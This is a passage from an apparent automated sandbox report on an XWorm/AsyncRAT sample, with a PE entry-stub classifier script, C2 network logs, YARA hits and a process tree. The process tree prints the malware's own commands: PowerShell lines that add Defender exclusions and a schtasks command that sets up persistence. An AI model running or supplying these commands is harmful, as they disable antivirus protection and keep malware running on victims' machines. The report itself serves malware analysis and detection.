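    """Decode 'FF 25 disp32' (jmp through an absolute memory operand).
    Returns the 32-bit address the jmp reads its target from, or None if the
    bytes are not that instruction."""
    if len(code) < 6 or code[0] != 0xFF or code[1] != 0x25:
        return None
    return struct.unpack_from("<I", code, 2)[0]


def classify_entry(entry_bytes, entry_va, image_base, sections, data_dirs, imports):
    """Describe the entry stub; every field is derived from the inputs."""
    entry_rva = entry_va - image_base
    target_va = decode_abs_jmp(entry_bytes)
    iat_rva, iat_size = data_dirs.get("IAT", (0, 0))
    com_rva, com_size = data_dirs.get("COM_DESCRIPTOR", (0, 0))
    info = {
        "entry_section": section_for_rva(entry_rva, sections),
        "jmp_target_rva": None if target_va is None else target_va - image_base,
        "target_in_iat": False,
        # A CLR header that lives inside a mapped section is what makes the file managed.
        "has_clr_header": com_size > 0 and section_for_rva(com_rva, sections) is not None,
        "imports_corexemain": "_CorExeMain" in imports.get("mscoree.dll", []),
        "padding_after_jmp": False,
    }
    if target_va is not None:
        rva = target_va - image_base
        # A PE32 IAT slot is 4 bytes; the stub must read exactly one slot inside the IAT.
        info["target_in_iat"] = iat_rva <= rva and rva + 4 <= iat_rva + iat_size
        # Everything after the 6-byte jmp should be zero padding, not further code.
        info["padding_after_jmp"] = not any(entry_bytes[6:])
    # The bootstrap pattern: one DLL, one import, jmp into the IAT, CLR header present.
    info["is_clr_bootstrap"] = (
        info["target_in_iat"] and info["has_clr_header"]
        and info["imports_corexemain"] and info["padding_after_jmp"]
        and len(imports) == 1 and sum(len(v) for v in imports.values()) == 1
    )
    return info


if __name__ == "__main__":
    result = classify_entry(ENTRY_BYTES, ENTRYPOINT_VA, IMAGE_BASE,
                            SECTIONS, DATA_DIRS, IMPORTS)
    for key, value in result.items():
        print(f"{key:>20}: {value}")
```

When `is_clr_bootstrap` is true, time spent in a native disassembler at the entry point is wasted: open the file in a .NET decompiler instead, and expect the string-decryption and dynamic-invoke behaviour the report flags to live in the IL.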
Timestamp                       | SID     | Signature                                                | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-12-16T08:37:58.894044+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1        | 192.168.2.4 | 49791       | 147.185.221.22 | 48990     | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 08:36:26.620574951 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 16, 2024 08:36:26.740487099 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 16, 2024 08:36:26.741278887 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 16, 2024 08:36:26.746061087 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 16, 2024 08:36:26.867441893 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 16, 2024 08:36:27.839034081 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 16, 2024 08:36:27.883371115 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 16, 2024 08:37:13.156794071 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 16, 2024 08:37:13.156862020 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 16, 2024 08:37:44.745074987 CET | 49791 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:37:44.866060019 CET | 48990 | 49791 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:37:44.866185904 CET | 49791 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:37:44.932198048 CET | 49791 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:37:45.051954985 CET | 48990 | 49791 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:37:58.894043922 CET | 49791 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:37:59.013761044 CET | 48990 | 49791 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:38:06.756989956 CET | 48990 | 49791 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:38:06.757055998 CET | 49791 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:08.031300068 CET | 49730 | 80 | 192.168.2.4 | 208.95.112.1
Dec 16, 2024 08:38:08.152837992 CET | 80 | 49730 | 208.95.112.1 | 192.168.2.4
Dec 16, 2024 08:38:09.962058067 CET | 49791 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:09.963326931 CET | 49846 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:10.083909988 CET | 48990 | 49791 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:38:10.084958076 CET | 48990 | 49846 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:38:10.085174084 CET | 49846 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:10.195744038 CET | 49846 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:10.315432072 CET | 48990 | 49846 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:38:20.665620089 CET | 49846 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:20.785264969 CET | 48990 | 49846 | 147.185.221.22 | 192.168.2.4
Dec 16, 2024 08:38:27.337660074 CET | 49846 | 48990 | 192.168.2.4 | 147.185.221.22
Dec 16, 2024 08:38:27.458909988 CET | 48990 | 49846 | 147.185.221.22 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 16, 2024 08:36:26.454912901 CET | 60635 | 53 | 192.168.2.4 | 1.1.1.1
Dec 16, 2024 08:36:26.594947100 CET | 53 | 60635 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 16, 2024 08:36:26.454912901 CET | 192.168.2.4 | 1.1.1.1 | 0x5a6 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 16, 2024 08:36:26.594947100 CET | 1.1.1.1 | 192.168.2.4 | 0x5a6 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                          • ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 208.95.112.1 | 80 | 1184 | C:\Users\user\Desktop\com surrogate.exe
Timestamp | Bytes transferred | Direction | Data
Dec 16, 2024 08:36:26.746061087 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 16, 2024 08:36:27.839034081 CET | 175 | IN | HTTP/1.1 200 OK
Date: Mon, 16 Dec 2024 07:36:27 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false

                                                                          Target ID:0
                                                                          Start time:02:36:19
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\Desktop\com surrogate.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\Desktop\com surrogate.exe"
                                                                          Imagebase:0x9b0000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2897221401.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1647881005.00000000009B2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2897221401.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Target ID:1
                                                                          Start time:02:36:27
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\com surrogate.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:02:36:27
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:02:36:42
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'com surrogate.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:02:36:42
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:02:36:54
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\svchostt.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:10
                                                                          Start time:02:36:54
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:11
                                                                          Start time:02:37:12
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchostt.exe'
                                                                          Imagebase:0x7ff788560000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:12
                                                                          Start time:02:37:12
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:13
                                                                          Start time:02:37:36
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchostt" /tr "C:\Users\user\svchostt.exe"
                                                                          Imagebase:0x7ff76f990000
                                                                          File size:235'008 bytes
                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:14
                                                                          Start time:02:37:36
                                                                          Start date:16/12/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff7699e0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:15
                                                                          Start time:02:37:36
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\svchostt.exe
                                                                          Imagebase:0x800000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\svchostt.exe, Author: ditekSHen
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 82%, ReversingLabs
                                                                          Has exited:true

                                                                          Target ID:17
                                                                          Start time:02:37:49
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\svchostt.exe"
                                                                          Imagebase:0x720000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:18
                                                                          Start time:02:37:58
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Users\user\svchostt.exe"
                                                                          Imagebase:0xd20000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          Target ID:19
                                                                          Start time:02:38:01
                                                                          Start date:16/12/2024
                                                                          Path:C:\Users\user\svchostt.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Users\user\svchostt.exe
                                                                          Imagebase:0xd40000
                                                                          File size:60'928 bytes
                                                                          MD5 hash:8843D79E5ECE984EF952051CB5B4F601
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                            Execution Graph

                                                                            Execution Coverage:20.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:40%
                                                                            Total number of Nodes:10
                                                                            Total number of Limit Nodes:0

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6$L$CAN_^
                                                                            • API String ID: 0-814290195
                                                                            • Opcode ID: 05c7148935a60c04fc822afb369fbfe927a92d0ab0a79f056cc2a9087e953a03
                                                                            • Instruction ID: 3f506514ab1789708d3cba6235bac6ff715f4fc62c886b75c799c43ede51fd10
                                                                            • Opcode Fuzzy Hash: 05c7148935a60c04fc822afb369fbfe927a92d0ab0a79f056cc2a9087e953a03
                                                                            • Instruction Fuzzy Hash: 8DD27270B1870D4FEB58EF6884A9ABDB7E1FF98704F144679E04DD32A5DE34A8418B42

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: B$L$CAN_^
                                                                            • API String ID: 0-398831512
                                                                            • Opcode ID: 84d48c25566d76b240f78f95d420c79db3d368e904635f851a55c9b08fee15a4
                                                                            • Instruction ID: 26d332f7495579d387963fd650321d5489f53dea3a48ed3da5baa3f28fbea3f5
                                                                            • Opcode Fuzzy Hash: 84d48c25566d76b240f78f95d420c79db3d368e904635f851a55c9b08fee15a4
                                                                            • Instruction Fuzzy Hash: 2DA27170B18A0D4FEB58EF6884A9AADB7E2FF98704F554579E00DD33A5CE34A8418B41

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: l_Z$l_Z
                                                                            • API String ID: 0-3759237847
                                                                            • Opcode ID: 7224614b654fa84f216a6f6619ec95809e3e0effa38d2516195d3eca8dde3954
                                                                            • Instruction ID: 1ae0eea8e59a519855d33bd0c1858b39a730ec356865028ac3d100349bde4eaf
                                                                            • Opcode Fuzzy Hash: 7224614b654fa84f216a6f6619ec95809e3e0effa38d2516195d3eca8dde3954
                                                                            • Instruction Fuzzy Hash: 11F19530A09A8D4FEBA8DF28C855BE977E1FF54310F04426EE85DC72A5DB34E9458B81

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: l_Z$l_Z
                                                                            • API String ID: 0-3759237847
                                                                            • Opcode ID: 395c5869ad1cfcc651178767a3a2886c7dff53b08719c6185c94ebf737d09b5d
                                                                            • Instruction ID: e0d0158ebce2b0cbc78b2becb08d0c7c703110852b7f2fbbc33d0ba9068a2ae9
                                                                            • Opcode Fuzzy Hash: 395c5869ad1cfcc651178767a3a2886c7dff53b08719c6185c94ebf737d09b5d
                                                                            • Instruction Fuzzy Hash: EFE1C530A09A8D4FEBA8DF28C8597E977D1FF54310F14436ED84DC72A5DB78A9408B81

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CAN_^
                                                                            • API String ID: 0-3098826533
                                                                            • Opcode ID: f7fe5b7da575121b7138d1885e816c4a5c8d56325c55edd54fdb2747265396b5
                                                                            • Instruction ID: c050053cf71f0c963fde4d07e28a9d362926b97b6720aae51ba9d4321a0e6406
                                                                            • Opcode Fuzzy Hash: f7fe5b7da575121b7138d1885e816c4a5c8d56325c55edd54fdb2747265396b5
                                                                            • Instruction Fuzzy Hash: 2032C760B19A494FE7A8EB688476ABD77D1FFD8704F5506B9E00DC33E6DE28A8018741

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID: CheckDebuggerPresentRemote
                                                                            • String ID:
                                                                            • API String ID: 3662101638-0
                                                                            • Opcode ID: cc88a98ac13735af6e8366722bb41ca71d5dbd26ea9d3cafc8cf37d01b49b8f3
                                                                            • Instruction ID: 735839a8710612437323314558fea2ddf29c8eeabc0f741c48b9b11d0f80d79c
                                                                            • Opcode Fuzzy Hash: cc88a98ac13735af6e8366722bb41ca71d5dbd26ea9d3cafc8cf37d01b49b8f3
                                                                            • Instruction Fuzzy Hash: F7410231A0875C8FCB58DF98C8466ED7BF0FF65311F0542AAD489D71A2DB34A906CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f04b1bf93bd637d75161b2ec13cc1c168b7dde2d42c8aad6cf775157b6446962
                                                                            • Instruction ID: 7b09990798720ff84f6fb557348fd36f71aa9ca49092aa85b637eba99c1288a3
                                                                            • Opcode Fuzzy Hash: f04b1bf93bd637d75161b2ec13cc1c168b7dde2d42c8aad6cf775157b6446962
                                                                            • Instruction Fuzzy Hash: 76C1D470B1DA4D4FEB98EBA884756B977D2EF99304F450279E04EC32F6DE28A9024741
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4c2b611081e3d0bbd8ff4dcf03fbbc4315b0b454c0f3be7a5b01860c8fff9b79
                                                                            • Instruction ID: 620b32977988567fc8cd7fab7828907bfc4c35dacc7065c1cf9fb71479955b1c
                                                                            • Opcode Fuzzy Hash: 4c2b611081e3d0bbd8ff4dcf03fbbc4315b0b454c0f3be7a5b01860c8fff9b79
                                                                            • Instruction Fuzzy Hash: 39511D10B1E6C94FD79AABB848746A67FE4DF87219B0801FAE09DCB1E7DD181806C342

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 925 7ffd9b7eb0dd-7ffd9b7eb1c0 RtlSetProcessIsCritical 928 7ffd9b7eb1c8-7ffd9b7eb1fd 925->928 929 7ffd9b7eb1c2 925->929 929->928
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalProcess
                                                                            • String ID:
                                                                            • API String ID: 2695349919-0
                                                                            • Opcode ID: 0b1ff55009d5dd830de577cb34452b68e37a9c6015b264e208263029f5a10e7e
                                                                            • Instruction ID: 09798f6ffda37cfc482baa98ffee10b4aa1b53d75b820fdeed67227b59794cf8
                                                                            • Opcode Fuzzy Hash: 0b1ff55009d5dd830de577cb34452b68e37a9c6015b264e208263029f5a10e7e
                                                                            • Instruction Fuzzy Hash: 9A41F43190C6588FC719DF98D855BE9BBF0EF96311F04416EE09AC3692CB74A446CB91

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 944 7ffd9b7eb628-7ffd9b7eb62f 945 7ffd9b7eb63a-7ffd9b7eb6ad 944->945 946 7ffd9b7eb631-7ffd9b7eb639 944->946 950 7ffd9b7eb739-7ffd9b7eb73d 945->950 951 7ffd9b7eb6b3-7ffd9b7eb6c0 945->951 946->945 952 7ffd9b7eb6c2-7ffd9b7eb6ff SetWindowsHookExW 950->952 951->952 954 7ffd9b7eb707-7ffd9b7eb738 952->954 955 7ffd9b7eb701 952->955 955->954
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2912588999.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_com surrogate.jbxd
                                                                            Similarity
                                                                            • API ID: HookWindows
                                                                            • String ID:
                                                                            • API String ID: 2559412058-0
                                                                            • Opcode ID: 8e0641952458e625ac5edab8e87a0ad70f4989dd584292b336234ab8db2e974e
                                                                            • Instruction ID: cabe22234b108e2cd45aefbd17c48e73c66434d12fc057013be955126c4ff53f
                                                                            • Opcode Fuzzy Hash: 8e0641952458e625ac5edab8e87a0ad70f4989dd584292b336234ab8db2e974e
                                                                            • Instruction Fuzzy Hash: A3411630A0CA5C4FDB58DF58985A6F9BBE1EF99321F00027FD04DD32A2CE64A80287C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.1871852084.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 971fbc99910d1e1f57fc32d4cc04cba9630715969924d8e89384917bb75ffa0f
                                                                            • Instruction ID: ce5418496ade33a0a1af82b666a83cfbeac1b44385355931f19f682961e691d4
                                                                            • Opcode Fuzzy Hash: 971fbc99910d1e1f57fc32d4cc04cba9630715969924d8e89384917bb75ffa0f
                                                                            • Instruction Fuzzy Hash: 6ED15772A0FA8E5FEB65EB6848755B97FE1EF0A294B0901FED44CC70E3D918A805C341
                                                                            Memory Dump Source
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 84b2a4b671021795bd69c52d83ef7620b8a43a3a3f61ecfc36342ef5deb3e295
                                                                            • Instruction ID: 96e82bc80a541169396669916723ddaf68569ea1ec101214746dd44ed9e370e9
                                                                            • Opcode Fuzzy Hash: 84b2a4b671021795bd69c52d83ef7620b8a43a3a3f61ecfc36342ef5deb3e295
                                                                            • Instruction Fuzzy Hash: D8D1A170A08A4D8FDF94EF58C465AED7BE1FF68340F1541AAD44DD72A6CA34E841CB81
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9db00539c41671b27e9a6bb9c9f382e45a8d8cfda554226f3c7bf6abf1c77347
